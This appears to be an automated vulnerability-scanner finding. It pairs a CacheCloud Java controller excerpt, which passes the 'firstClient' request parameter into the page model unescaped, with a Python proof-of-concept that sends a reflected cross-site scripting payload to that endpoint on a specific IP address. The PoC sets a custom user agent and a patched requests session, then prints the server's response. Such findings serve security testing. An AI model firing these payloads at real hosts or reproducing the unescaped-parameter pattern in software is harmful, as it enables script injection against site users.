// src/main/java/com/sohu/cache/web/controller/AppClientDataShowController.java#L270-L306 270: @RequestMapping({"/exceptionStatistics/client"}) 271: public ModelAndView getExceptionStatisticsByClient(HttpServletRequest request, HttpServletResponse response, Model model) { 272: Long appId = NumberUtils.toLong(request.getParameter("appId")); 273: if (appId <= 0L) { 274: return new ModelAndView(""); 275: } else { 276: model.addAttribute("appId", appId); 277: Integer type = NumberUtils.toInt(request.getParameter("exceptionType")); 278: String viewName = type == 0 ? "connExceptionStatisticsByClient" : "cmdExceptionStatisticsByClient"; 279: String searchDate = request.getParameter("searchDate"); 280: TimeBetween timeBetween = new TimeBetween(); 281: 282: try { 283: timeBetween = this.fillWithDateFormat(searchDate); 284: } catch (ParseException e) { 285: this.logger.error(e.getMessage(), e); 286: } 287: 288: long startTime = timeBetween.getStartTime(); 289: long endTime = timeBetween.getEndTime(); 290: model.addAttribute("searchDate", timeBetween.getFormatStartDate()); 291: Map<String, List<String>> clientConfigMap = this.appClientReportExceptionService.getAppClientConfigs(appId, type, startTime, endTime); 292: model.addAttribute("clientConfigMap", clientConfigMap); 293: String firstClient = request.getParameter("firstClient"); 294: if (StringUtils.isBlank(firstClient) && CollectionUtils.isNotEmpty(clientConfigMap.keySet())) { 295: firstClient = (String)clientConfigMap.keySet().iterator().next(); 296: } 297: 298: model.addAttribute("firstClient", firstClient); 299: Map<String, List<Map<String, Object>>> appClientExceptionStatisticsMap = this.appClientReportExceptionService.getAppExceptionStatisticsMap(appId, firstClient, startTime, endTime, type); 300: model.addAttribute("appClientExceptionStatisticsJson", JSONObject.toJSONString(appClientExceptionStatisticsMap)); 301: List<Map<String, Object>> appNodeExceptionStatisticsList = this.appClientReportExceptionService.getDistinctClientNodeStatistics(appId, firstClient, startTime, endTime, type); 302: model.addAttribute("appNodeExceptionStatisticsList", appNodeExceptionStatisticsList); 303: return new ModelAndView("client/" + viewName); 304: } 305: } 306: 

import requests from requests.sessions import Session class CustomSession(Session): def request( self, method, url, params = None, data = None, headers = None, cookies = None, files = None, auth = None, timeout = None, allow_redirects = True, proxies = None, hooks = None, stream = None, verify = None, cert = None, json = None, ): arg_names = ( 'method', 'url', 'params', 'data', 'headers', 'cookies', 'files', 'auth', 'timeout', 'allow_redirects', 'proxies', 'hooks', 'stream', 'verify', 'cert', 'json' ) local_variables = locals() local_variables = {n: local_variables[n] for n in local_variables if n in arg_names} local_variables['headers'] = local_variables.get('headers') or dict() local_variables['headers'].update({'referer': 'http://34.169.199.145:40101/admin/app/list', 'User-Agent': 'oxpecker', 'accept-language': 'en-US', 'x-requested-with': 'XMLHttpRequest', 'origin': 'http://34.169.199.145:40101', 'upgrade-insecure-requests': '1', 'pragma': 'no-cache', 'cache-control': 'no-cache', 'accept-encoding': 'gzip, deflate'}) return super().request(**{n: local_variables[n] for n in local_variables if n in arg_names}) requests.sessions.Session = CustomSession # ================================== Poc Start =================================== import requests url = 'http://34.169.199.145:40101/client/show/exceptionStatistics/client' payload = {'appId': '1', 'exceptionType': '0', 'searchDate': '2023-01-01', 'firstClient': '"><scripT>alert("zast-xss")</SCriPt>//'} response = requests.post(url, data=payload, verify=False, allow_redirects=False) print('Status Code:', response.status_code) print('Response Text:', response.text) # =================================== Poc End ====================================